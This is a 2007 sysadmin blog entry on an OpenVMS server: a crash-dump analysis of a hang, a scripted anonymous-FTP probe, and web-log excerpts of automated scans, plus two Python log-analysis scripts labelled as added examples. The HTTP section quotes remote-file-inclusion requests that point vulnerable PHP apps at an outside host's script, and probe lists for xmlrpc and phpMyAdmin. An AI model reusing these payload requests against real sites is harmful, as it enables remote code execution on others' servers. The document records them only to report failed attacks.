13-Mar-2007

System hang
Diana appeared unresponsive tonight; I had to stop the CPU and crash the system to find out what was going on.
In the operator log there is not a clue, just that it must have happened after 00:39:
%%%%%%%%%%% OPCOM 13-MAR-2007 00:29:19.84 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 156.153.255.206 Port: 52398

%%%%%%%%%%% OPCOM 13-MAR-2007 00:39:47.81 %%%%%%%%%%%
Logfile time stamp
Crash analysis shows a weird symptom:
SDA> SHO SUM
Current process summary
-----------------------
Extended Indx Process name Username State Pri PCB/KTB PHD Wkset
-- PID -- ---- --------------- ------------ ------- --- -------- -------- ------
20200101 0001 SWAPPER SYSTEM HIB 16 818E45C8 818E4000 0
20200107 0007 CLUSTER_SERVER SYSTEM HIB 13 81D52E80 83992000 103
20200108 0008 CONFIGURE SYSTEM RWCAP 11 81D47E40 8398E000 19
20200109 0009 LANACP SYSTEM RWCAP 15 81E7EAC0 83994000 21
2020010B 000B IPCACP SYSTEM RWCAP 11 81E83080 83998000 22
2020010C 000C ERRFMT SYSTEM COMO 11 81E84580 8399A000 27
2020010D 000D CACHE_SERVER SYSTEM HIBO 16 81E85600 8399C000 32
2020010E 000E OPCOM SYSTEM COMO 11 81E87200 8399E000 32
2020010F 000F AUDIT_SERVER AUDIT$SERVER HIB 10 81E89580 839A0000 104
20200110 0010 JOB_CONTROL SYSTEM COMO 11 81E8BA40 839A2000 32
20200112 0012 QUEUE_MANAGER SYSTEM COMO 11 81E8DC80 839A4000 30
20200113 0013 SECURITY_SERVER SYSTEM RWCAP 11 81EA7040 839A6000 106
20200114 0014 ACME_SERVER SYSTEM HIB 8 81E37940 839A8000 214
20200117 0017 DNS$ADVER SYSTEM RWCAP 7 81E80280 83996000 233
20200118 0018 LES$ACP_V30 SYSTEM HIB 8 81EAF340 839AA000 94
20200119 0019 NET$ACP DNA$SessCtrl COMO 11 81FC8E40 839AC000 27
2020011A 001A REMACP SYSTEM HIBO 8 81FD0100 839AE000 21
2020011B 001B NET$EVD SYSTEM COMO 11 81FD3740 839B0000 28
2020011C 001C DTSS$SERVICE SYSTEM LEFO 10 81FD9480 839B2000 32
2020011D 001D SMISERVER SYSTEM COMO 11 81FDE980 839B4000 25
2020011E 001E TP_SERVER SYSTEM RWCAP 11 81FE1C00 839B6000 57
20203921 0021 SMTP_DIANA_01 SYSTEM HIBO 4 820C41C0 839BE000 30
20200129 0029 DECW$SERVER_0 SYSTEM RWCAP 9 81FE8D40 839BC000 375
20200132 0032 TCPIP$INETACP INTERnet HIB 10 81FE95C0 839BA000 148
20200333 0033 TCPIP$BIND_1 TCPIP$BIND RWCAP 11 820283C0 839C0000 179
20200135 0035 TCPIP$PORTM_1 TCPIP$PORTM COMO 11 82029000 839C2000 24
20200136 0036 TCPIP$DHCP_1 TCPIP$DHCP COMO 11 820940C0 839C4000 32
20200137 0037 TCPIP$FTP_1 TCPIP$FTP COMO 11 8209DB80 839C6000 31
20200138 0038 TCPIP$IMAP_1 TCPIP$IMAP RWCAP 11 820AA340 839C8000 84
20200139 0039 TCPIP$NTP_1 TCPIP$NTP RWCAP 11 820B0580 839CA000 169
2020013A 003A TCPIP$POP_1 TCPIP$POP COMO 11 820B2F80 839CC000 32
2020013B 003B TCPIP$PWIP_ACP SYSTEM HIB 8 820B9540 839CE000 204
2020013D 003D TCPIP$NTP_4646 TCPIP$NTP COMO 11 820BB540 839D2000 25
2020013E 003E TCPIP$XDM_1 TCPIP$XDM COMO 11 820D1C00 839D4000 25
2020393F 003F DTLOGIN LEFO 4 81D49A00 839DA000 32
20203940 0040 DTGREET SYSTEM COMO 11 820DE600 83990000 31
20200146 0046 HTTPd:80 HTTP$SERVER RWCAP 7 820D4AC0 839D6000 453
20200147 0047 HyperSPI++ SYSTEM RWCAP 9 820DA8C0 839DC000 70
20200148 0048 DBL$MSGMGR SYSTEM COMO 11 8210D940 839DE000 26
2020014A 004A MYSQL_SERVER MYSQL_SERVER RWCAP 6 82110140 839E2000 1525
2020014B 004B SYMBIONT_2 SYSTEM RWCAP 7 8210E400 839E0000 55
202040D6 00D6 HTTPd:80-25 HTTP$NOBODY COMO 11 81FE7040 839B8000 32
202040D7 00D7 HTTPd:80-26 HTTP$NOBODY RWCAP 7 820D8A00 839D0000 873
202040D8 00D8 HTTPd:80-27 HTTP$NOBODY COMO 11 82133D40 839D8000 32
202040D9 00D9 HTTPd:80-28 HTTP$NOBODY COMO 11 820D7440 839E4000 32
202040DA 00DA HTTPd:80-29 HTTP$NOBODY RWCAP 7 82118BC0 839E6000 2460
202040DB 00DB HTTPd:80-30 HTTP$NOBODY COMO 11 82119E00 839E8000 32
202040DC 00DC HTTPd:80-31 HTTP$NOBODY COMO 11 820DC280 839EA000 32
202040DD 00DD HTTPd:80-32 HTTP$NOBODY COMO 11 820F1600 839EC000 32
202040DE 00DE HTTPd:80-33 HTTP$NOBODY RWCAP 7 820DDE00 839EE000 864
202040DF 00DF HTTPd:80-34 HTTP$NOBODY COMO 11 82503D80 839F0000 32
202040E0 00E0 HTTPd:80-35 HTTP$NOBODY RWCAP 11 81FE3240 839F2000 589
202040E1 00E1 HTTPd:80-36 HTTP$NOBODY RWCAP 7 82518AC0 839F4000 619
202040E2 00E2 HTTPd:80-37 HTTP$NOBODY RWCAP 7 822D8CC0 839F6000 483
202040E3 00E3 HTTPd:80-38 HTTP$NOBODY RWCAP 7 820DF940 839F8000 581
202040E4 00E4 HTTPd:80-39 HTTP$NOBODY RWCAP 11 822253C0 839FA000 531
20203CE5 00E5 HTTPd:80-40 HTTP$NOBODY COMO 11 825037C0 839FC000 32
20203DE6 00E6 HTTPd:80-41 HTTP$NOBODY COMO 11 82226500 839FE000 32
202040E7 00E7 HTTPd:80-42 HTTP$NOBODY COMO 11 8222D100 83A00000 32
20203AE9 00E9 TCPIP$SM_BG5119 TCPIP$SMTP RWCAP 11 82134A00 83A02000 271
20203FEA 00EA TCPIP$SM_BG6439 TCPIP$SMTP RWCAP 11 82126600 83A04000 106
202040EB 00EB TCPIP$SM_BG7024 INTERnet COMO 11 82517F40 00000000 8
202040EC 00EC TCPIP$SM_BG9759 INTERnet COMO 11 8269E900 00000000 8
202040ED 00ED TCPIP$S_BG12519 INTERnet COMO 11 82285E40 00000000 8
202040EE 00EE TCPIP$S_BG13032 INTERnet COMO 11 8251A780 00000000 8
202040EF 00EF TCPIP$S_BG13105 INTERnet COMO 11 8254A440 00000000 8
202040F0 00F0 TCPIP$S_BG14251 INTERnet COMO 11 82502C40 00000000 8
20203DF1 00F1 TCPIP$S_BG14323 INTERnet COMO 11 8268BA00 00000000 8
202040F2 00F2 TCPIP$S_BG15158 INTERnet COMO 11 82622DC0 00000000 8

I checked the TCPIP$S* processes: I could only access the first two, because the rest are swapped out and can therefore not be accessed. The first of them has a lot of section files open, and one BG device: the one listed in its name:

SDA> SHO PROC/IND=E9/CHAN
Channel CCB Window Status Device/file accessed
------- --- ------ ------ --------------------
...
0150 7FF76280 81E67AC0 $116$DKA100:(3814,2,0) (section file)
0160 7FF762A0 00000000 BG5119:
0170 7FF762C0 824F5180 $116$DKA100:(9006,2,0)
0180 7FF762E0 82021C00 $116$DKA100:(8793,3,0) (section file)

but the second one has just 16 channels open – and BG6439 is not among them – not yet, or no longer; I cannot tell from here.
However, I could get at the other devices another way:
SDA> TCPIP SHO DEV BG*
...
BG7024 Stream 25 2232 SMTP 90.10.163.238 ESTAB
BG9759 Stream 25 2222 SMTP 219.91.78.141 ESTAB
BG11183 Idle
BG11189 Stream 25 0 SMTP LISTEN
BG12519 Stream 25 4927 SMTP 196.204.217.69 ESTAB
BG13032 Stream 25 57913 SMTP 63.251.223.186 CLOSEWT
BG13105 Stream 25 58231 SMTP 63.251.223.186 CLOSEWT
BG14251 Stream 25 60648 SMTP 63.251.223.186 CLOSEWT
BG14323 Stream 25 60783 SMTP 63.251.223.186 CLOSEWT
BG15158 Stream 25 10093 SMTP 76.1.5.201 ESTAB
...

All referring to these processes.
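The matching I did by hand above (process name TCPIP$S*_BGnnnn against the BG device list) is easy to automate. The script below is an added example, not part of this entry or of any VMS tool: it parses the two SDA listings as plain text, joins each server process to the socket named in its process name, and reports which swapped-out processes own sockets that are stuck in CLOSEWT. Column positions, the state names and the reading of PHD 00000000 as "outswapped" are assumptions taken from the listing above, not a documented SDA output format; the sample lines are copied from the dump.

```python
"""Join an SDA> SHO SUM process list to SDA> TCPIP SHO DEV BG* output.

Added example, not the author's code: automates the manual step of
matching TCPIP$S*_BGnnnn processes to their BG devices.  Parsing rules
are assumptions read off the plain-text listing, not a documented format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a subset of the SDA> SHO SUM data lines from the dump.
SDA_SUMMARY = """\
20203AE9 00E9 TCPIP$SM_BG5119 TCPIP$SMTP RWCAP 11 82134A00 83A02000 271
20203FEA 00EA TCPIP$SM_BG6439 TCPIP$SMTP RWCAP 11 82126600 83A04000 106
202040EB 00EB TCPIP$SM_BG7024 INTERnet COMO 11 82517F40 00000000 8
202040ED 00ED TCPIP$S_BG12519 INTERnet COMO 11 82285E40 00000000 8
202040EE 00EE TCPIP$S_BG13032 INTERnet COMO 11 8251A780 00000000 8
202040F0 00F0 TCPIP$S_BG14251 INTERnet COMO 11 82502C40 00000000 8
"""

# Constructed sample: a subset of the SDA> TCPIP SHO DEV BG* lines from the dump.
TCPIP_DEVICES = """\
BG7024 Stream 25 2232 SMTP 90.10.163.238 ESTAB
BG11183 Idle
BG11189 Stream 25 0 SMTP LISTEN
BG12519 Stream 25 4927 SMTP 196.204.217.69 ESTAB
BG13032 Stream 25 57913 SMTP 63.251.223.186 CLOSEWT
BG14251 Stream 25 60648 SMTP 63.251.223.186 CLOSEWT
"""


@dataclass
class Proc:
    pid: str
    name: str
    user: str
    state: str
    phd: str

    @property
    def swapped_out(self) -> bool:
        # Assumption: PHD 00000000 marks an outswapped process header; these
        # are exactly the processes SDA could not examine in the dump above.
        return self.phd == "00000000"

    @property
    def bg_device(self) -> Optional[str]:
        m = re.search(r"_(BG\d+)$", self.name)
        return m.group(1) if m else None


@dataclass
class Sock:
    device: str
    local_port: int
    remote_port: int
    remote_host: Optional[str]
    state: str


def parse_summary(text: str) -> List[Proc]:
    """Parse SHO SUM data lines; header lines and blank lines are skipped."""
    procs = []
    for line in text.splitlines():
        f = line.split()
        # A data line starts with an 8-hex-digit PID.  The username column can
        # be blank (DTLOGIN in the dump), so anchor the right-hand columns
        # from the end: ... state pri PCB PHD wkset.
        if len(f) < 8 or not re.fullmatch(r"[0-9A-F]{8}", f[0]):
            continue
        user = f[3] if len(f) == 9 else ""
        procs.append(Proc(pid=f[0], name=f[2], user=user, state=f[-5], phd=f[-2]))
    return procs


def parse_devices(text: str) -> Dict[str, Sock]:
    """Parse SHO DEV BG* lines into a device -> socket map ("Idle" is skipped)."""
    socks: Dict[str, Sock] = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("BG"):
            continue
        host = f[5] if len(f) >= 7 else None      # LISTEN sockets carry no peer
        socks[f[0]] = Sock(f[0], int(f[2]), int(f[3]), host, f[-1])
    return socks


def correlate(procs: List[Proc], socks: Dict[str, Sock]) -> Dict[str, dict]:
    """Join every BG-named process to its socket, keyed by process name."""
    out = {}
    for p in procs:
        dev = p.bg_device
        if dev is None:
            continue
        s = socks.get(dev)
        out[p.name] = {
            "device": dev,
            "proc_state": p.state,
            "swapped_out": p.swapped_out,
            "sock_state": s.state if s else None,   # None: device not listed
            "remote": s.remote_host if s else None,
        }
    return out


def closewt_by_host(socks: Dict[str, Sock]) -> Dict[str, int]:
    """Count CLOSEWT sockets per remote host; a pile-up from one peer stands out."""
    counts: Dict[str, int] = {}
    for s in socks.values():
        if s.state == "CLOSEWT" and s.remote_host:
            counts[s.remote_host] = counts.get(s.remote_host, 0) + 1
    return counts


if __name__ == "__main__":
    joined = correlate(parse_summary(SDA_SUMMARY), parse_devices(TCPIP_DEVICES))
    for name, info in joined.items():
        print(f"{name:16} {info['device']:8} proc={info['proc_state']:6} "
              f"swapped={info['swapped_out']!s:5} sock={info['sock_state']} "
              f"peer={info['remote']}")
    print("CLOSEWT per peer:", closewt_by_host(parse_devices(TCPIP_DEVICES)))
```

Run on the sample, it shows the same picture as the manual check: the two RWCAP SMTP processes have no socket left in the device list, while the swapped-out ones sit on sockets that are still ESTAB or CLOSEWT, and 63.251.223.186 accounts for every CLOSEWT entry.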
Port 80 – the HTTP server – might be a cause as well:
BG4911 Stream 80 55225 66.135.34.87 CLOSEWT
BG4921 Stream 80 59178 64.34.165.60 CLOSEWT
BG4925 Stream 80 60734 72.36.254.194 CLOSEWT
BG4936 Stream 80 60567 216.118.117.66 CLOSEWT
BG4938 Stream 80 55250 66.135.34.87 CLOSEWT
BG4948 Stream 80 47724 72.36.254.186 CLOSEWT
BG4950 Stream 80 47728 72.36.254.186 CLOSEWT
BG4951 Stream 80 47726 72.36.254.186 CLOSEWT
BG5021 Stream 80 54992 74.6.67.198 CLOSEWT
BG5030 Stream 80 59334 66.249.72.142 CLOSEWT

and there are quite a few HTTP processes running.
Anyway, after reboot, all seems Ok.
This needs further investigation!
According to the books, RWCAP means: Waiting for CPU capacity. But no process is keeping the CPU, at least so it seems – there is no process in CUR state. Obviously, perhaps, since I stopped the CPU and crashed the system 😉

I checked the logfiles of SMTP:
$ dir tcpip$smtp_common:/sin/dat

Directory SYS$SPECIFIC:[TCPIP$SMTP]

TCPIP$SMTP_LOGFILE.LOG;577       13-MAR-2007 19:20:35.24
TCPIP$SMTP_RECV_RUN.LOG;16985    13-MAR-2007 19:57:45.37
TCPIP$SMTP_RECV_RUN.LOG;16984    13-MAR-2007 01:20:49.60
TCPIP$SMTP_RECV_RUN.LOG;16983    13-MAR-2007 00:29:58.79

The last two did not finish:
$ Set NoOn
$ VERIFY = F$VERIFY(F$TRNLNM("SYLOGIN_VERIFY"))
[End of file]

and the preceding one did.

So that leads to the conclusion that the problem must have started at 00:30 or so – with this message attempt?

It’s not in the webserver access logfile:
74.6.68.199 - - [12/Mar/2007:23:54:25 +0100] "GET /family/Willem/viewpoint_3.ht
diana.intra.grootersnet.nl - HTTP$SERVER [13/Mar/2007:19:20:43 +0100] "POST /DI
66.249.72.142 - - [13/Mar/2007:19:20:47 +0100] "GET /family/Holiday2004/22-Jul/

or any other.

RWCAP: The OpenVMS Alpha Internals book states (paragraph 2.4.2):

…A COM kernel thread selected for execution can enter the RWCAP miscellaneous wait state if its capability and affinity requirement have no match on any active member of an SMP system…

This is really weird, since Diana is a single-CPU system. It might mean that something WAS wrong internally: a capability (CPB$V_RUN, CPB$V_QUORUM or CPB$V_PRIMARY) may have been lost.

(To be continued)

FTP – in OPERATOR.LOG

It has been months since the last attempt to abuse the anonymous FTP account, but in yesterday’s log there is one:

%%%%%%%%%%% OPCOM 10-MAR-2007 21:53:19.82 %%%%%%%%%%%
Message from user TCPIP$FTP on DIANA
User Name: anonymous
Source: host104-231-static.110-62-b.business.telecomitalia.it
Status: NOPRIV -- File access violation
Object: WEB_DISK2:[public.anonymous.070310215318p]

In FTP’s run-log, this attempt is shown in full. For readability, I left out (as usual) all extra lines, just showing what’s been attempted:

%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from host104-231-static.110-62-b.business.telecomitalia.it at 10-MAR-2007 21:53:16.17
%TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it
%TCPIP-I-FTP_USER, user name: anonymous
%TCPIP-I-FTP_OBJ, object: /pub/
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to set default directory
%SYSTEM-W-BADIRECTORY, bad directory file format
%TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it
%TCPIP-I-FTP_USER, user name: anonymous
%TCPIP-I-FTP_OBJ, object: /public/incoming/
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to set default directory
%TCPIP-I-FTP_OBJ, object: /pub/incoming/
%TCPIP-I-FTP_OBJ, object: /incoming/
%TCPIP-I-FTP_OBJ, object: /upload/
%TCPIP-I-FTP_OBJ, object: /_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /_vti_txt/
%TCPIP-I-FTP_OBJ, object: /_vti_log/
%TCPIP-I-FTP_OBJ, object: /wwwroot/
%TCPIP-I-FTP_OBJ, object: /anonymous/
%TCPIP-I-FTP_OBJ, object: /public/
%TCPIP-I-FTP_OBJ, object: WEB_DISK2:[public.anonymous.070310215318p]
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to create directory
%SYSTEM-F-NOPRIV, insufficient privilege or object protection violation
%TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it
%TCPIP-I-FTP_USER, user name: anonymous

This is the one that shows up in operator.log. The attempts in the last months did not try to create a directory, so that will be the reason they don’t show up in operator.log.
%TCPIP-I-FTP_OBJ, object: /outgoing/
%TCPIP-I-FTP_OBJ, object: /temp/
%TCPIP-I-FTP_OBJ, object: /tmp/
%TCPIP-I-FTP_OBJ, object: /anonymous/_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /anonymous/incoming/
%TCPIP-I-FTP_OBJ, object: /mailroot/
%TCPIP-I-FTP_OBJ, object: /ftproot/
%TCPIP-I-FTP_OBJ, object: /anonymous/pub/
%TCPIP-I-FTP_OBJ, object: /anonymous/public/
%TCPIP-I-FTP_OBJ, object: /_vti_cnf/
%TCPIP-I-FTP_OBJ, object: /anonymous/_vti_cnf/
%TCPIP-I-FTP_OBJ, object: /images/
%TCPIP-I-FTP_OBJ, object: /_private/
%TCPIP-I-FTP_OBJ, object: /cgi-bin/
%TCPIP-I-FTP_OBJ, object: /usr/
%TCPIP-I-FTP_OBJ, object: /usr/incoming/
%TCPIP-I-FTP_OBJ, object: /home/
%TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]tagged
%TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]Tagged
%TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]TaGGeD
%TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]data
%TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]Data
%TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]^%

%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from host104-231-static.110-62-b.business.telecomitalia.it at 10-MAR-2007 21:53:23.22

A script, no doubt, and not a very clever one either. No-one is able to type all these attempts within a minute.
The ISP (telecomitalia.it) will be notified.
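The tell-tale sign above is the rate: dozens of directory probes in seven seconds, which nobody types by hand. As an added example (not the author's procedure, nor anything shipped with TCPIP Services), the script below reads FTP run-log lines in the format shown above, groups them into sessions between the FTP_SESCON and FTP_SESDCN lines, and flags a session as scripted when it tries more than a set number of objects within a set number of seconds. It also counts the "Failed to ..." lines and the %SYSTEM-F-NOPRIV violations, the one event that reaches OPCOM. The message formats and timestamp layout are taken from the log above; the thresholds and the second, benign session are constructed for the example.

```python
"""Flag scripted anonymous-FTP directory probing in a TCPIP$FTP run-log.

Added example, not the author's code: sessions are delimited by the
FTP_SESCON / FTP_SESDCN lines, and a session with many object attempts
in a short time is reported as scripted.  Thresholds are assumptions.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional

# Constructed sample: lines copied from the run-log above (shortened), followed
# by a made-up benign session so that the rule has a negative case.
SAMPLE_LOG = """\
%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from host104-231-static.110-62-b.business.telecomitalia.it at 10-MAR-2007 21:53:16.17
%TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it
%TCPIP-I-FTP_USER, user name: anonymous
%TCPIP-I-FTP_OBJ, object: /pub/
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to set default directory
%SYSTEM-W-BADIRECTORY, bad directory file format
%TCPIP-I-FTP_OBJ, object: /public/incoming/
%TCPIP-I-FTP_OBJ, object: /pub/incoming/
%TCPIP-I-FTP_OBJ, object: /incoming/
%TCPIP-I-FTP_OBJ, object: /upload/
%TCPIP-I-FTP_OBJ, object: /_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /wwwroot/
%TCPIP-I-FTP_OBJ, object: /anonymous/
%TCPIP-I-FTP_OBJ, object: /public/
%TCPIP-I-FTP_OBJ, object: WEB_DISK2:[public.anonymous.070310215318p]
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to create directory
%SYSTEM-F-NOPRIV, insufficient privilege or object protection violation
%TCPIP-I-FTP_OBJ, object: /cgi-bin/
%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from host104-231-static.110-62-b.business.telecomitalia.it at 10-MAR-2007 21:53:23.22
%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from example-client.invalid at 10-MAR-2007 22:10:00.00
%TCPIP-I-FTP_USER, user name: anonymous
%TCPIP-I-FTP_OBJ, object: /pub/
%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from example-client.invalid at 10-MAR-2007 22:14:30.00
"""

TS_FMT = "%d-%b-%Y %H:%M:%S.%f"          # VMS timestamp, e.g. 10-MAR-2007 21:53:16.17
TS_RE = r"(\d{1,2}-[A-Z]{3}-\d{4} \d\d:\d\d:\d\d\.\d+)"
SESCON = re.compile(r"^%TCPIP-I-FTP_SESCON, .* from (\S+) at " + TS_RE + "$")
SESDCN = re.compile(r"^%TCPIP-I-FTP_SESDCN, .* from (\S+) at " + TS_RE + "$")
USER = re.compile(r"^%TCPIP-I-FTP_USER, user name: (\S+)$")
OBJ = re.compile(r"^%TCPIP-I-FTP_OBJ, object: (.+)$")
CHINFO = re.compile(r"^%TCPIP-I-FTP_CHINFO, \S+: (.+)$")
SYSERR = re.compile(r"^%SYSTEM-[FEW]-(\w+),")

MAX_OBJECTS = 10      # assumption: more object attempts than this ...
WINDOW_SECONDS = 60   # ... inside this many seconds is not a person typing


@dataclass
class Session:
    host: str
    start: datetime
    end: Optional[datetime] = None
    user: Optional[str] = None
    objects: List[str] = field(default_factory=list)       # FTP_OBJ targets
    failures: List[str] = field(default_factory=list)      # "Failed to ..." texts
    system_errors: List[str] = field(default_factory=list)  # %SYSTEM-x-NAME codes

    @property
    def seconds(self) -> float:
        return ((self.end or self.start) - self.start).total_seconds()


def parse_sessions(text: str) -> List[Session]:
    """Split the run-log into sessions; lines outside any session are ignored."""
    sessions: List[Session] = []
    cur: Optional[Session] = None
    for line in text.splitlines():
        if m := SESCON.match(line):
            cur = Session(host=m.group(1), start=datetime.strptime(m.group(2), TS_FMT))
            sessions.append(cur)
        elif cur is None:
            continue
        elif m := SESDCN.match(line):
            cur.end = datetime.strptime(m.group(2), TS_FMT)
            cur = None
        elif m := USER.match(line):
            cur.user = m.group(1)
        elif m := OBJ.match(line):
            cur.objects.append(m.group(1))
        elif m := CHINFO.match(line):
            cur.failures.append(m.group(1))
        elif m := SYSERR.match(line):
            cur.system_errors.append(m.group(1))
    return sessions


def is_scripted(s: Session) -> bool:
    """Rate rule: too many object attempts in too short a session."""
    return len(s.objects) > MAX_OBJECTS and s.seconds <= WINDOW_SECONDS


def summarize(sessions: List[Session]) -> List[dict]:
    return [{
        "host": s.host, "user": s.user, "objects": len(s.objects),
        "seconds": round(s.seconds, 2), "failures": len(s.failures),
        "noprivs": s.system_errors.count("NOPRIV"), "scripted": is_scripted(s),
    } for s in sessions]


if __name__ == "__main__":
    for row in summarize(parse_sessions(SAMPLE_LOG)):
        print(row)
```

The first session comes out with 11 object attempts in 7.05 seconds, two "Failed to" lines and one NOPRIV, so it is flagged; the constructed second session (one object in four and a half minutes) is not. The NOPRIV count is the figure to compare against OPERATOR.LOG, since only the create-directory failure produces an OPCOM message.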

More attempts by HTTP

If it weren’t a pest to other systems, I could laugh loudly. The thought that you could bring the server down by simply accessing default locations, as if this were a standard Windows or Linux system. Take last week’s server log for the public web:
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868

He tried it again some time later, from the same address and, at first glance, with the same script, and of course with the same outcome: NOTHING.
The same applies to this attempt. I’m not sure, but it looks like a forum package to me:
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /live/help.php?css_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:44 +0100] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360

Yes, I do have MySQL and of course PHPMyAdmin, but what makes this guy think it would be on a publicly accessible site? That would be asking for trouble:
193.164.131.46 - - [25/Feb/2007:11:49:52 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /NoService.html HTTP/1.0" 200 2135
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /admin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /db/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /dbadmin/main.php HTTP/1.0" 302 341
